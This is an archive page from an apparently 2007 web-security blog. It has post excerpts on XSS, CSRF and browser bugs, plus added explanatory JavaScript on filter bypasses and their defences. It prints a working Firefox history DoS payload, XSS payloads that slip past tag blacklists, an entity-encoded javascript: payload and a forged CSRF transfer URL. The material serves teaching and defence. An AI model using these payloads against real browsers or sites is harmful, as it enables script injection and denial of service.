Archives for the Month of November, 2007

Pointing the finger

I’ve just seen on the news today that German supermarkets are using biometric data like fingerprints to pay for goods. The claims are increased convenience and the ability to earn points just by using your finger. It all sounds good to the average consumer, but what would happen if this method were used instead of debit/credit cards? In […]

XCSS

I thought I’d continue the theme of experimenting with XSS and trying different things. I haven’t seen this written about anywhere, so here goes. The idea is using CSS as an XSS payload; this can be useful when filters allow some things but make it difficult to construct an attack. I’ve decided to call it […]

Unusual XSS vectors

I’ve been working on my Hackvertor script to include XSS fuzzing, which isn’t ready yet, but I thought you might be interested in a few interesting results I’ve found 🙂 First off, I’m sure you know you can use XSS in an img object, yeah? Well, did you know there’s also an image object as […]
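The img/image point above is a good illustration of why tag blacklists fail: the HTML parser treats an `<image>` start tag as `<img>`, so a filter that only looks for the string "<img" passes an equivalent payload straight through, while an allowlist of known-good tag names does not. The following is an added example written for this page, not code from the original post or from Hackvertor; the tag lists, function names and sample fragments are all constructed for the illustration.

```javascript
// Added example (not from the original post): a tag-name blacklist versus an
// allowlist, run over constructed fragments. The parser alias <image> -> <img>
// is what lets the blacklisted payload through.

const BLOCKED_TAGS = ['script', 'img', 'iframe', 'object', 'embed']; // constructed
const ALLOWED_TAGS = ['b', 'i', 'p', 'a', 'br'];                      // constructed

// Lowercase tag names of every start tag in the fragment ("</b" is not matched
// because "/" is not a letter).
function startTagNames(html) {
  const names = [];
  const re = /<\s*([a-zA-Z][a-zA-Z0-9-]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Blacklist: rejects only tags it has heard of.
function blacklistAllows(html) {
  return !startTagNames(html).some((t) => BLOCKED_TAGS.includes(t));
}

// Allowlist: rejects anything not explicitly approved.
function allowlistAllows(html) {
  return startTagNames(html).every((t) => ALLOWED_TAGS.includes(t));
}

// Constructed sample inputs.
const SAMPLES = {
  benign: '<p>Hello <b>world</b></p>',
  imgPayload: '<img src=x onerror=alert(1)>',
  imagePayload: '<image src=x onerror=alert(1)>', // parsed as <img>, not on the blacklist
};

// Returns, per sample, whether each filter would let it through.
function compareFilters() {
  const out = {};
  for (const [name, html] of Object.entries(SAMPLES)) {
    out[name] = { blacklist: blacklistAllows(html), allowlist: allowlistAllows(html) };
  }
  return out;
}

console.log(JSON.stringify(compareFilters(), null, 2));
```

The blacklist lets `imagePayload` through while rejecting the visually identical `imgPayload`; the allowlist rejects both and keeps the benign fragment. The regex tokenizer here is deliberately simple; a real filter should parse with an HTML parser and then apply the allowlist to the resulting tree.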

CSK update

Sirdarckcat has been doing some work on my CSK kit and has improved it with new events and data handling improvements. This is great news because I haven’t had a chance to work on it for a while; with all the projects I’m involved in there’s just not enough time in the day. It’s still early […]

CSRF browser protection

I like the topic of CSRF because it’s such a difficult problem to solve. I was thinking about ways a browser can prevent CSRF and I’ve come up with the following solutions:- 1. After a domain name, any image/object/frame etc. request is truncated by a user-definable setting. Limiting the amount of data an attacker […]
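To make proposal 1 concrete, here is an added model of it, written for this page rather than taken from the post. As I read the proposal, the browser leaves same-origin requests alone, and for an embedded resource (img/object/frame) whose origin differs from the page’s it keeps the scheme and host and truncates everything after the host to a user-definable length. The function name, the limit, and the bank/attacker URLs are all constructed for the illustration.

```javascript
// Added example (not from the original post): one reading of proposal 1.
// Cross-origin embedded-resource URLs lose everything after the host beyond
// `limit` characters; same-origin requests are untouched.

function truncateEmbeddedRequest(pageOrigin, requestUrl, limit) {
  const page = new URL(pageOrigin);
  const req = new URL(requestUrl);
  const sameOrigin = page.protocol === req.protocol && page.host === req.host;
  if (sameOrigin) return req.href; // first-party resources are not limited
  const afterHost = req.pathname + req.search + req.hash;
  return req.protocol + '//' + req.host + afterHost.slice(0, limit);
}

// Do the named query parameters survive truncation? Used to judge whether a
// forged request still carries what the attacker needed.
function parametersSurvive(url, names) {
  const params = new URL(url).searchParams;
  return names.every((n) => params.has(n));
}

// Constructed scenario: a page on the attacker's origin embeds an <img> whose
// src is a state-changing GET on the bank.
const ATTACKER_PAGE = 'https://evil.example/';
const FORGED_REQUEST = 'https://bank.example/transfer?to=attacker&amount=1000';
const USER_LIMIT = 10; // hypothetical user-definable setting

function demo() {
  const fromAttacker = truncateEmbeddedRequest(ATTACKER_PAGE, FORGED_REQUEST, USER_LIMIT);
  const fromBank = truncateEmbeddedRequest('https://bank.example/', FORGED_REQUEST, USER_LIMIT);
  return {
    fromAttacker,
    fromBank,
    attackStillWorks: parametersSurvive(fromAttacker, ['to', 'amount']),
  };
}

console.log(demo());
```

With the limit at 10 the forged request arrives as `https://bank.example/transfer?` with both parameters gone, while the bank’s own page can still load the full URL. Two caveats a reader should weigh (mine, not the post’s): the same truncation hits legitimate cross-site embeds with long paths, and it does nothing for forged POST requests, which carry their parameters in the body rather than the URL.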

Safari security

Well, what do you do when you report a bug to Apple and they deny it is even a problem? Turn it into a remote one. What do you do when they don’t provide you with any credit whatsoever? Give up? Stop testing Safari? Or drink lots of coffee and Red Bull, stay up all […]

Firefox history DoS attack

Here’s a complete DoS attack on Firefox using the history object:-

window.onload = function() {
  history.__defineGetter__("x", function() {
    for (var i in this) {
      try { alert(this[i]); } catch (e) { }
    }
  });
  history.x;
}

Tested on Firefox 2.0.0.9 on Mac: a window pops up with two blank buttons and you are unable to do anything without using […]
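The pattern the payload relies on is a getter, installed on an object, that walks every enumerable property of that same object when read. Since the getter property is itself enumerable, the walk reads it again and the getter re-enters itself. The following is an added example for this page, not code from the original post: it reproduces that re-entrancy under Node with a depth cap in place of alert(), and shows a defensive enumeration that skips accessor properties. It does not claim to be the exact reason Firefox 2.0.0.9 locked up; the object, depth cap and function names are constructed.

```javascript
// Added example (not from the original post). A self-enumerating getter
// re-enters itself; the depth counter stands in for the nested alert() dialogs.

function selfEnumeratingGetterDepth(maxDepth) {
  const target = { a: 1, b: 2 }; // constructed stand-in for `history`
  let depth = 0;
  let deepest = 0;
  // Object.defineProperty is the standard equivalent of __defineGetter__.
  Object.defineProperty(target, 'x', {
    enumerable: true,
    configurable: true,
    get() {
      depth++;
      if (depth > deepest) deepest = depth;
      if (depth <= maxDepth) {
        for (const k in this) {
          // reading this['x'] re-invokes this getter
          try { void this[k]; } catch (e) { /* swallowed, as in the payload */ }
        }
      }
      depth--;
      return undefined;
    },
  });
  void target.x;
  return deepest; // maxDepth + 1: the last call is the one that stops recursing
}

// Defensive enumeration: look at descriptors and skip accessors, so that
// listing an object's properties can never run code.
function dataPropertyNames(obj) {
  return Object.keys(obj).filter((k) => {
    const d = Object.getOwnPropertyDescriptor(obj, k);
    return d !== undefined && 'value' in d;
  });
}

console.log('deepest re-entry:', selfEnumeratingGetterDepth(5));
```

Without the cap the recursion would only stop when the engine runs out of stack; in a browser each level also blocks on a modal dialog, which is why a page that does this is hard to escape from.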

Spoofing Firefox protected objects

I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong 🙂 This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know 😉). There […]

WebFu – Using the Hackvertor hanzo sword

I see, my pupil, that you are now ready to learn the ways of the samurai sword. The Shaolin Warrior’s IDS tiger style is strong, but it is no match for the Hackvertor hanzo sword. Observe:-

javascript:alert(/XSS PUNCH!/)

Which produces a devastating blow:-

&#x6A&#97vascrip&#x74&#58ale&#x72&#x74&#x28&#x2F&#x58&#x53&#x53&#x20&#x50&#x55&#x4E&#x43&#x48&#x21&#x2F&#x29

I hope you have enjoyed this lesson, young one […]
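The encoded blow above mixes hexadecimal and decimal numeric character references and drops the terminating semicolons, which browsers tolerate inside attribute values; a signature looking for the literal "javascript:" never sees it, while the browser decodes it to exactly that. Below is an added example written for this page, not Hackvertor’s code: a small encoder that produces the same style of output, the decoder a filter or IDS must apply before matching, and a naive versus a normalised signature check. The payload text is the one from the post; the encoder’s alternation scheme and all function names are my own.

```javascript
// Added example (not Hackvertor's code): mixed hex/decimal numeric character
// references without semicolons, and the normalisation a filter needs.

// Encode every character, alternating hex and decimal references, no ';'.
function mixedEntityEncode(s) {
  return Array.from(s)
    .map((ch, i) => {
      const code = ch.codePointAt(0);
      return i % 2 === 0 ? '&#x' + code.toString(16).toUpperCase() : '&#' + code;
    })
    .join('');
}

// Decode numeric references whether or not a ';' terminates them, matching
// the leniency browsers show in attribute values.
function numericEntityDecode(s) {
  return s.replace(/&#([xX][0-9a-fA-F]+|[0-9]+);?/g, (_, num) => {
    const isHex = num[0] === 'x' || num[0] === 'X';
    const code = isHex ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return String.fromCodePoint(code);
  });
}

// A signature as a naive IDS would write it...
function naiveSignatureHit(s) {
  return /javascript\s*:/i.test(s);
}

// ...and the same signature applied after normalisation.
function normalisedSignatureHit(s) {
  return naiveSignatureHit(numericEntityDecode(s));
}

const PAYLOAD = 'javascript:alert(/XSS PUNCH!/)'; // from the post
const ENCODED_FROM_POST =
  '&#x6A&#97vascrip&#x74&#58ale&#x72&#x74&#x28&#x2F&#x58&#x53&#x53&#x20&#x50&#x55&#x4E&#x43&#x48&#x21&#x2F&#x29';

console.log(mixedEntityEncode(PAYLOAD));
console.log(numericEntityDecode(ENCODED_FROM_POST));
console.log('naive:', naiveSignatureHit(ENCODED_FROM_POST), 'normalised:', normalisedSignatureHit(ENCODED_FROM_POST));
```

Note the decoder’s one ambiguity, which is also the encoder’s: a hex reference with no semicolon followed by a literal hex digit (`&#x61bc`) swallows the digits, so an encoder that leaves some characters literal, as the post’s payload does with "vascrip" and "ale", has to make sure the following literal is not one the reference could absorb. Encoding every character, as mixedEntityEncode does, sidesteps that.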

WebFu Dojo – XSS self defence

Welcome, my young apprentice, so you want to learn how to defend yourself from the onslaught of XSS ninjas, do you? Well, in my first Dojo lesson I shall show you techniques of the Shaolin crane style to defend yourself from the XSS punch.

XSS roundhouse

Use the roundhouse wisely, my young master, and always […]